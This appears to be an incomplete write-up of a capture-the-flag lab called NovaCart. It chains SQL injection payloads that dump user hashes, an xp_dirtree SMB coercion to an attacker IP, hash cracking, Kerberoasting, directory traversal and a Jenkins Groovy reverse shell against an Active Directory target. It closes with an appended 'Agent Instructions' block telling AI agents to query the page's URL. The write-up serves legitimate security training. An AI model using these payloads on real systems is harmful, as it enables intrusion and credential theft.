# NovaCart (Hard) ### Objective NovaCart is an e-commerce company that operates a webshop for PC accessories. However, the entire platform is still under active development and expansion. The IT team is currently working on a Linux-based version of the webshop as well as the development of a mobile app for NovaCart. The team is focused on adding features quickly, and has not prioritized security. We have been tasked with conducting a penetration test to thoroughly assess the environment, identify vulnerabilities, and evaluate the overall security of the system. ### Scanning ``` nmap -p- --min-rate 1000 -vv 10.1.106.238 PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5000/tcp open upnp 5985/tcp open wsman 8080/tcp open http-proxy 9389/tcp open adws ``` The exposed services strongly suggested that the target was an Active Directory environment. Additional web services were also identified on ports `80`, `5000`, and `8080`. ### Website (5000) Looking at the site on port 5000 it asks for authentication we will note this.

It uses NTLM auth

### Website (8080) * It's running jenkins and need valid creds

### Website (80) Enumeration Browsing the web application revealed an e-commerce platform containing categories such as: * Graphic Cards * Laptops * PCs * Motherboards * Storage * Accessories

A search functionality was available at the top of the page. Searching for valid product names such as: ``` laptop ```

returned matching products successfully. ### SQL Injection Testing the search parameter for SQL injection revealed that the application was vulnerable. ``` ' OR 1=1-- - ``` ``` http://10.1.106.238/search.aspx?q=%27%20OR%201=1--%20- ``` The application returned all available products, confirming the presence of a SQL Injection vulnerability.

#### Determining the Number of Columns To identify the number of columns in the query, the following payload was used: ``` ' ORDER BY 5-- - #Encoded request: '%20order%20by%205--%20- ``` Confirmed the 5 columns doing order by 6 generated a `500 Internal Server Error`, confirming that the query contained **5 columns**. #### Identifying Reflected Columns A UNION-based payload used to determine which column was reflected in the response: ``` %' UNION SELECT '1','l1nuxkid','3','4','5'-- // %25'+UNION+SELECT+'1',+'l1nuxkid',+'3',+'4',+'5'+--+// ``` The string `l1nuxkid` appeared in the application response, confirming that the **second column** was reflected.

#### Database Enumeration The current database name was extracted using: ``` %' UNION SELECT '1', DB_NAME(), '3', '4', '5' -- // http://10.1.106.238/search.aspx?q=%' UNION SELECT '1', DB_NAME(), '3', '4', '5' -- // ``` This revealed the database name: `NovaCart`

#### Database User The database user context was identified using: ``` http://10.1.106.238/search.aspx?q=admin%27%20union%20select%20%271%27,user_name(),%273%27,%274%27,%275%27--%20-// admin' UNION SELECT '1',USER_NAME(),'3','4','5'-- - ``` Gives username ``` IIS APPPOOL\DefaultAppPool ```

#### Enumerating Tables and Columns ``` %' UNION SELECT '1', table_name, '3', '4', '5' FROM information_schema.tables WHERE table_catalog='novacart' -- // ```

A table named `users` was identified. Now we know the table name we need now column\_name ``` %' UNION SELECT '1', column_name, '3', '4', '5' FROM information_schema.columns WHERE table_name='users' -- // ```

Perfact: We Know the * Database name = `novacart` * Table\_name = users * Column\_name = `id`, `password_hash`, `username` #### Dumping User Credentials Let's Dump `username` `password_hash` columns from table users and databse novacart ``` ' UNION select '1',username,'3','4','5' from users-- // ```

Now dump password\_hash ``` %' UNION SELECT '1',password_hash,'3','4','5' from users-- // ```

### Combining Results OR we could do both Using `CONCAT()` function, `CONCAT_WS` function ``` %' UNION SELECT '1', CONCAT(username, ':', password_hash), '3', '4', '5' FROM users -- // %' UNION SELECT '1', CONCAT_WS(':', username, password_hash), '3', '4', '5' FROM users -- // ```

Now we have usernames, password\_hash | username | password\_hash | | ---------- | --------------------------------------------------------------------- | | d.barowski | 57eeb5788565564c9a3a0283eb615204534583a8fbd3ccae1637a04df12287b1:jb43 | | d.winkler | 65a3657685b09db625ef25da7754d7d140e75c3640dc2482de87218ee8d85b2b:jb44 | | j.paul | 66be630f32845c0d7b098b4d94f1ca424ae3e35266267078f7974248caf412ac:jb45 | | m.ruehl | bf9b834e082c88823b59d05446a819276a907114c928505b829ddbbad73d6d35:jb42 | ### Attempted Hash Capture via xp\_dirtree I also attempted coerce SMB authentication using `xp_dirtree`: ``` GET /search.aspx?q=abcd'; use master; exec xp_dirtree '\\10.200.55.193\share';-- - ``` However, the captured machine account hash was not useful for further exploitation. cannot crack

### Hash Cracking ``` hash-identifier 57eeb5788565564c9a3a0283eb615204534583a8fbd3ccae1637a04df12287b1 ```

After testing multiple Hashcat modes, mode `1420` successfully matched the hash format.

``` hashcat hashes /usr/share/wordlists/rockyou.txt -m 1420 ```

### SMB Enumeration ``` nxc smb novacart.local -u usernames -p pass --continue-on-success ```

We have now valid creds ``` j.paul : password123 d.barowski : kubarow ``` Enumerated all domain users ``` nxc smb novacart.local -u j.paul -p password123 --users-export user ```

``` nxc smb novacart.local -u j.paul -p password123 --shares ```

* A non-default share named `shares` was identified. ``` smbclient //novacart.local/shares -U j.paul ``` Poking around found couple of things that later utilized such as jenkins.ini file, and a removed user is pending j.dhillon that might have priviledge and autologon ### BloodHound Collection ``` bloodhound-python -u j.paul -p password123 -k -ns 10.1.106.238 -c All -d novacart.local --zip ```

### Genericwrite over J.BRONSKI Analyzing Bloodhound data identified that `d.barowski` had `GenericAll` privileges over multiple users, including `j.bronski`. The user `j.bronski` was especially interesting because the account belonged to the `WEBAPP_OPERATORS` group.

``` targetedKerberoast.py -v -d 'novacart.local' -u 'd.barowski' -p 'kubarow' ```

``` hashcat hash /usr/share/wordlists/rockyou.txt $krb5tgs$23$*j.bronski$NOVACART.LOCAL$61bff39a0757--SNIP--:jan162005 ``` Looking at the shortest path from domain admin

### Use Creds of `J.BRONSKI` on port 5000 Using the credentials for `j.bronski`, authentication to the web application on port `5000` was successful. ``` j.bronski : jan162005 ``` The portal exposed: * system information * an IT Team Management Portal While browsing the application, the following parameter was observed: `view.aspx?file=it_team.aspx`

### Directory Travarsal

During earlier SMB enumeration, a file named `jenkins.ini` had been identified within the shared drive. Using directory traversal through the vulnerable `file` parameter, the `jenkins.ini` file was successfully read, revealing valid Jenkins credentials.

### Port 8080 | Jenkins

Authentication using the credentials recovered from `jenkins.ini` was successful.

Navigating to `/script` this provides access to the Jenkins Script Console. A Groovy reverse shell payload was executed, resulting in remote command execution

### Shell as svc\_jenkins

During enumeration of SMB shares and internal files, references were discovered indicating that the user `j.dhillon` had something on autologon.

PENDINGGGGG --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/novacart-hard.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.